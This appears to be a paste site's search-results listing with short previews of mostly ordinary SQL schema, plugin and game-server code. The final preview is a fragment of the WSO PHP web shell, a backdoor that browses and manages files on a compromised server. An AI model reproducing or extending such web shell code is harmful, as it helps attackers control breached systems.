42.7K results in 752 ms
5 years ago · May 21, 2020, 03:46 PM
use vulnSensors; drop table if exists sensors; create table sensors(no int not null auto_increment, timestmp varchar(100),
5 years ago · May 21, 2020, 12:34 PM
eee %player%" on load: if file "plugins/QEnchant/config.yml" doesn't exists: create file "plugins/QEnchant/config.yml" download from
5 years ago · May 21, 2020, 08:21 AM
OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; DROP TABLE IF EXISTS `a`; CREATE TABLE `a` ( `cmd` text NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
5 years ago · May 20, 2020, 11:36 PM
PRIMARY KEY (`id`))DEFAULT CHARSET=utf8mb4; CREATE TABLE IF NOT EXISTS ck_bonus (steamid VARCHAR(32), name
5 years ago · May 20, 2020, 09:16 PM
storage_engine=InnoDB; SET FOREIGN_KEY_CHECKS = 1; CREATE DATABASE IF NOT EXISTS CICLISTI CHARACTER SET utf8mb4;
5 years ago · May 20, 2020, 08:18 PM
table if exists Test; create table if not exists Test ( id_test int, id_quest
5 years ago · May 20, 2020, 06:32 PM
table if exists Question; create table if not exists Question ( question varchar(45), answer1
5 years ago · May 20, 2020, 03:02 PM
table if exists `mydb`.`TeamSeason`; create table if not exists `mydb`.`TeamSeason` ( `gameDate` int not
5 years ago · May 20, 2020, 01:12 PM
Eksamen2019 cascade; create schema if not exists Eksamen2019; set search_path to Eksamen2019; create table DEPARTMENT ( Dname varchar(255), Dnumber
5 years ago · May 20, 2020, 08:16 AM
n.exec(e));) { var i = a[0]; if (":not" === i) { if (0 === r.length)
5 years ago · May 20, 2020, 07:08 AM
TABLE IF EXISTS indra.citrix_2020_05_12_data; -- CREATE TABLE IF NOT EXISTS indra.citrix_2020_05_12_data ( -- usuario_encript INT, -- dia_inicio_sesion
5 years ago · May 19, 2020, 06:54 PM
if (isConnected()) try { con.createStatement().executeUpdate( "CREATE TABLE IF NOT EXISTS FFA (Playername VARCHAR(100), UUID
5 years ago · May 19, 2020, 06:16 PM
storage_engine=InnoDB; SET FOREIGN_KEY_CHECKS = 1; CREATE DATABASE IF NOT EXISTS CICLISTI CHARACTER SET utf8mb4;
5 years ago · May 19, 2020, 03:36 PM
user sources -- queries MySQL.createCommand("vRP/base_tables",[[ CREATE TABLE IF NOT EXISTS vrp_users( id INTEGER AUTO_INCREMENT,
5 years ago · May 19, 2020, 01:38 PM
s)",1) def db_create(table_name,lis): createsqltable = """CREATE TABLE IF NOT EXISTS """ + table_name + " (" + " VARCHAR(1000),".join(lis) + " VARCHAR(1000))" SQLighter().insert(createsqltable)
5 years ago · May 19, 2020, 11:55 AM
NewsMessage( id = 78, text = "If matter exists, then does antimatter not exist?" ), NewsMessage( id = 79,
5 years ago · May 19, 2020, 10:30 AM
WHERE A.inventory_id = vTrfInId AND NOT EXISTS (SELECT 1 FROM in_product_balance_stock
5 years ago · May 19, 2020, 09:52 AM
WHERE A.inventory_id = vTrfInId AND NOT EXISTS (SELECT 1 FROM in_product_balance_stock
5 years ago · May 19, 2020, 08:10 AM
Check that both parameters exists if not process_name or not process_func
5 years ago · May 19, 2020, 04:42 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
Total pages: 2134